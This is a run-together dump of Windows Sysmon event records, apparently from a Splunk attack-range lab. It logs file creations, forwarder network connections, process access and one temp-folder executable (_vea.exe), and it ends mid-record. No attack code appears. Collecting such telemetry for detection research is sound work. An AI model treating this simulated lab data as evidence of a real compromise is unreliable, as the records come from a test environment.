Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C62009F6F91A5C413CF49DF8F4C19D4,SHA256=B1B6EE3560B9E166444C45232614A154CB347E602D373AFBE01FAD077C7DAFB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:30.415{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B87B72AFE532F637A13BCA8431E7935F,SHA256=930C013E9897E94D8431CB32654A0AD3D28F249AAB06ED748FA38F73DC0B8448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:30.384{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE34A2822D05A4BF96EE52B92CE815B,SHA256=856BDE3A5A22693197E6A7891A1E1EACCF2739CB2C191B9AAF78FE68E33F9095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:30.584{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\12009MD5=BACF54D8D9187D30E4EF43B44F95EAC3,SHA256=1133B50376872BFE9ADBF1B6223AC13741791E794CDBB0A7C853C984969BEAF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:30.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEEE6E192A4E972C46E0E739010B1BD,SHA256=F9376E2A542BFFE715863C5095345195CED8372C52B236E2BA7135E61559E204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:31.415{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745050C0857C739A97E48DF82B939346,SHA256=9E39DDFB1D00B840C3DCCDF0985738049ABE56900D6C251F292A1200AD7E33CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:31.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A10A6D0699FFB842FBFAD05DC2AF37D,SHA256=E23F3DC4F199359C39E2870DB0AA6A8E110BD01ECF5CD2C93525F7CD88859C6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:32.634{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87FE393987B451003AD5B44EAAF0270A,SHA256=F16C3979694BEE6622F021961DEFC92EE41EBB60BE2C97B33E12D184F6121789,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000296455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:32.433{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000296454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:32.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619BC0FF58CA9658935BFB9813A20F00,SHA256=E7E14D87837E0D2E899E630C9393574900C94229BBD60D1E27D1CEACAF724617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:33.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EF9A3D495978D6B2B2D7920C40CEEC,SHA256=1500E68D0E0EA3732E5E8FB178E7AA7E8CD051E1CF2B919BAB53E997D240B8ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:33.517{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=352A586AFB41508FB1390AE428116EEB,SHA256=D95627ACF7F2095DB1A3747B3926692AD4CE84BB55FE77A750760C0D740AC456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:33.485{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038B40134D3F2B561B8AC6681D8F4B2C,SHA256=816A111E857C12D39F77746DC597DC828B038F28C63A5BBAA690568C9B36BF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:34.681{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E240827B54E344962EBFA0E47B2FD9,SHA256=7C6938D0E81B110B8D648371BEC3EFCCA19FAA95E6B67C359AEDC4A93360248D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:32.621{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:34.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FC58C97819D44F73DE188264B595533,SHA256=60A6C49D75BFFAFBAD7CBC6F1BDCA843FC15278709857D1D960416FFB8E1A06A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:31.615{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51585-false10.0.1.12-8000- 23542300x8000000000000000220458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:35.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E71E51CA1C680BE19A3F639F272ED2,SHA256=FE08B3922EF7E5B47F73CD37742ED0B264D9BF934AB5CD94CDF183C253D63244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:35.515{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B7BFD5C3E24E9FF64F77919CC779FD,SHA256=A5276EFA850D83328975A7BB3F9049EDFB5C4514DB056C990B15D23D4C27B0F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:36.516{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1489B95E0641F72551157371C34634BC,SHA256=35A3F3AEA261A57A27B5C902DE003C627CDD4FA0E14A1DD495E56402979EC403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:37.783{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:37.783{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=6542E9525B91AF8F7BF7AA43B88893ED,SHA256=B9F722C84519A2F517594451FE568A346B89839380CEE9DF74FDB1A28B98FAD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:37.550{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC90DB16ED70AE380DC54167E2C22037,SHA256=3AB64831D9A6929E1ED946140D65CBD0B827EC2EA7B7589B888FD5BB39826606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:37.071{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88AF911C8F87CE540ABEC4F50DC19582,SHA256=9271A7A9649AFF9FE116F9D5E255D8809164262D6C17F635CE2D943294A7BB7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:38.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15BF47187D7823D85D9CC2CEAC6E87A8,SHA256=B21513810379F3BFDF7205CF9BB3BE508969AFDD805C56348B0A4D4EF7884E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:38.165{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450CD1BB6D6E5BCF735EEF5726A089A7,SHA256=010C86088D1FC74E06A04859505C805C724DF782C79D9A8876EA661F2FAB0710,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:39.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978256031DD924A375676E232D0A999E,SHA256=457BEFD49E72AAB5F93F8925F65DAB5DAA54094AAC9960BE52EC18BAE5DF1A33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:37.771{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:20b3:19bc:f5ff:fef0win-host-tcontreras-attack-range-985546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x8000000000000000220462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:37.584{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51586-false10.0.1.12-8000- 23542300x8000000000000000220461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:39.181{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0FF5FDEA7E9E74458D9F61E16511D77,SHA256=245684B0E1A7097834AF8467C69CEBA15DD99A3D7AB050DCED23E2361DA7E91D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:38.557{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49350-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:40.597{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F815AEDCA85C4C2646A123CE960171A,SHA256=D851AFD243B2CA0E2585087BD825752A9D13096A3590C722A8D8BF04A3A61115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:40.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14D198E06A58AF19FC813F084088FC9F,SHA256=A7D62457AC9E89E3CFD16468DE6057018E1F857AE7375BBA8DF78666DFB96D7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:40.329{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:39.787{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000296470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:41.597{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DB971BBD29EED61D52FCDCF954CF73B,SHA256=47EFA0461FFA8A4C1805ED184A25BAEC43167336A401FB0233E5A984EBE60C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:41.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93F7FD18358F58D58D5FA7030DA2C195,SHA256=1B0A74816DB125C7EE37D2F06223B5AE30AB8C55D4C5E033ED3F7C952F7701AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:42.612{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AE94CD0F9A829B08E65DB74A715F37,SHA256=1F7F0AEBA57358DCE5AFD21AC06A017E7D62C70B96603D772F870CD67F01ECD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:42.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F308821C28AE6DE9DF3481F8833F37,SHA256=DFF0A0979454D392DC8F13403FD0A43EE021C1C40BBE0CE0346E967A23B5DFD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:43.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44A162099398E0AFA8BD03FF850FC123,SHA256=7D6B14D49C024E6D3AC31F1E7E1FB16249DB2ADF1F18D9CFD7718AA7A33E7C89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:43.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6C5C970C88D1089DA6CD826146C3AC2,SHA256=EF1A8CCBE82C79E8C55CB424CE4F529A702238706B8E3BB36B62DEFB36775356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:44.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F31BD840DEE5BDE6FE205D24B6AE72F,SHA256=BC7189AD20A3A6E5283385154DA0AB05EBAB6885321F39E3C6032DB80552940E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1670-6216-EC04-000000003902}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 